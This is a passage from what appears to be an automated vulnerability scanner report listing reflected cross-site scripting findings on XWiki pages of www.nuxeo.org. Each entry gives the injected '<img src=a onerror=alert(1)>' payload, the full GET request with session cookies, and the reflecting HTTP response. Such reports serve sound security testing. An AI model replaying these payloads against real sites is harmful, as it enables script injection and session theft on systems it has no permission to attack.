"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace61c31%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ed24e0bc59b3'>ContributionSpace61c31<img src=a onerror=alert(1)>d24e0bc59b3</a>
...[SNIP]...

4.484. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/ContributionSpace

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6af3"><img%20src%3da%20onerror%3dalert(1)>761b200ad62 was submitted in the REST URL parameter 5. This input was echoed as f6af3"><img src=a onerror=alert(1)>761b200ad62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/ContributionSpacef6af3"><img%20src%3da%20onerror%3dalert(1)>761b200ad62 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:33 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13051
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/ContributionSpacef6af3%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E761b200ad62?format=xar&amp;name=Main.ContributionSpacef6af3"><img src=a onerror=alert(1)>761b200ad62&amp;pages=Main.ContributionSpacef6af3">
...[SNIP]...

4.485. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Dashboard

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 210a4"><img%20src%3da%20onerror%3dalert(1)>0659efe6902 was submitted in the REST URL parameter 4. This input was echoed as 210a4"><img src=a onerror=alert(1)>0659efe6902 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main210a4"><img%20src%3da%20onerror%3dalert(1)>0659efe6902/Dashboard HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:49 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12963
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main210a4%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E0659efe6902/Dashboard?format=xar&amp;name=Main210a4"><img src=a onerror=alert(1)>0659efe6902.Dashboard&amp;pages=Main210a4">
...[SNIP]...

4.486. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Dashboard

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f93c1<img%20src%3da%20onerror%3dalert(1)>4d9be4736ed was submitted in the REST URL parameter 4. This input was echoed as f93c1<img src=a onerror=alert(1)>4d9be4736ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainf93c1<img%20src%3da%20onerror%3dalert(1)>4d9be4736ed/Dashboard HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:40 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12897
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Mainf93c1%3Cimg+src%3Da+onerror%3Dalert%281%29%3E4d9be4736ed/">Mainf93c1<img src=a onerror=alert(1)>4d9be4736ed</a>
...[SNIP]...

4.487. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Dashboard

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b787b"><img%20src%3da%20onerror%3dalert(1)>f9b9ae24085 was submitted in the REST URL parameter 5. This input was echoed as b787b"><img src=a onerror=alert(1)>f9b9ae24085 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Dashboardb787b"><img%20src%3da%20onerror%3dalert(1)>f9b9ae24085 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:09 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12947
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/Dashboardb787b%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef9b9ae24085?format=xar&amp;name=Main.Dashboardb787b"><img src=a onerror=alert(1)>f9b9ae24085&amp;pages=Main.Dashboardb787b">
...[SNIP]...

4.488. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Dashboard

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 97ab6<img%20src%3da%20onerror%3dalert(1)>29fb3ec50ba was submitted in the REST URL parameter 5. This input was echoed as 97ab6<img src=a onerror=alert(1)>29fb3ec50ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Dashboard97ab6<img%20src%3da%20onerror%3dalert(1)>29fb3ec50ba HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:58 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12885
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard97ab6%3Cimg+src%3Da+onerror%3Dalert%281%29%3E29fb3ec50ba'>Dashboard97ab6<img src=a onerror=alert(1)>29fb3ec50ba</a>
...[SNIP]...

4.489. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Downloads

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4a8a"><img%20src%3da%20onerror%3dalert(1)>1bb236ad708 was submitted in the REST URL parameter 4. This input was echoed as b4a8a"><img src=a onerror=alert(1)>1bb236ad708 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainb4a8a"><img%20src%3da%20onerror%3dalert(1)>1bb236ad708/Downloads HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:17 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12963
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Mainb4a8a%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E1bb236ad708/Downloads?format=xar&amp;name=Mainb4a8a"><img src=a onerror=alert(1)>1bb236ad708.Downloads&amp;pages=Mainb4a8a">
...[SNIP]...

4.490. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Downloads

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b4709<img%20src%3da%20onerror%3dalert(1)>207cbf0fc30 was submitted in the REST URL parameter 4. This input was echoed as b4709<img src=a onerror=alert(1)>207cbf0fc30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainb4709<img%20src%3da%20onerror%3dalert(1)>207cbf0fc30/Downloads HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:59 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12897
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Mainb4709%3Cimg+src%3Da+onerror%3Dalert%281%29%3E207cbf0fc30/">Mainb4709<img src=a onerror=alert(1)>207cbf0fc30</a>
...[SNIP]...

4.491. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Downloads

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfcbe"><img%20src%3da%20onerror%3dalert(1)>9b72863cbb6 was submitted in the REST URL parameter 5. This input was echoed as bfcbe"><img src=a onerror=alert(1)>9b72863cbb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Downloadsbfcbe"><img%20src%3da%20onerror%3dalert(1)>9b72863cbb6 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:43 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12947
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/Downloadsbfcbe%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9b72863cbb6?format=xar&amp;name=Main.Downloadsbfcbe"><img src=a onerror=alert(1)>9b72863cbb6&amp;pages=Main.Downloadsbfcbe">
...[SNIP]...

4.492. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Downloads

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 373b0<img%20src%3da%20onerror%3dalert(1)>9fa509c902d was submitted in the REST URL parameter 5. This input was echoed as 373b0<img src=a onerror=alert(1)>9fa509c902d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Downloads373b0<img%20src%3da%20onerror%3dalert(1)>9fa509c902d HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12885
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/Downloads373b0%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9fa509c902d'>Downloads373b0<img src=a onerror=alert(1)>9fa509c902d</a>
...[SNIP]...

4.493. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 34dd9<img%20src%3da%20onerror%3dalert(1)>4dbb20e4ed3 was submitted in the REST URL parameter 4. This input was echoed as 34dd9<img src=a onerror=alert(1)>4dbb20e4ed3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main34dd9<img%20src%3da%20onerror%3dalert(1)>4dbb20e4ed3/Howto+launch+the+selenium+test+suite HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:01 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13258
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main34dd9%3Cimg+src%3Da+onerror%3Dalert%281%29%3E4dbb20e4ed3/">Main34dd9<img src=a onerror=alert(1)>4dbb20e4ed3</a>
...[SNIP]...

4.494. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adc0c"><img%20src%3da%20onerror%3dalert(1)>ff8c6314af6 was submitted in the REST URL parameter 4. This input was echoed as adc0c"><img src=a onerror=alert(1)>ff8c6314af6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainadc0c"><img%20src%3da%20onerror%3dalert(1)>ff8c6314af6/Howto+launch+the+selenium+test+suite HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:34 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13324
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Mainadc0c%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eff8c6314af6/Howto+launch+the+selenium+test+suite?format=xar&amp;name=Mainadc0c"><img src=a onerror=alert(1)>ff8c6314af6.Howto launch the selenium test suite&amp;pages=Mainadc0c">
...[SNIP]...

4.495. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9017"><img%20src%3da%20onerror%3dalert(1)>b19d426ad36 was submitted in the REST URL parameter 5. This input was echoed as d9017"><img src=a onerror=alert(1)>b19d426ad36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Howto+launch+the+selenium+test+suited9017"><img%20src%3da%20onerror%3dalert(1)>b19d426ad36 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:52 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13308
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
tp://www.nuxeo.org/xwiki/bin/export/Main/Howto+launch+the+selenium+test+suited9017%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eb19d426ad36?format=xar&amp;name=Main.Howto launch the selenium test suited9017"><img src=a onerror=alert(1)>b19d426ad36&amp;pages=Main.Howto launch the selenium test suited9017">
...[SNIP]...

4.496. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2b2fb<img%20src%3da%20onerror%3dalert(1)>5aad0972571 was submitted in the REST URL parameter 5. This input was echoed as 2b2fb<img src=a onerror=alert(1)>5aad0972571 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite2b2fb<img%20src%3da%20onerror%3dalert(1)>5aad0972571 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
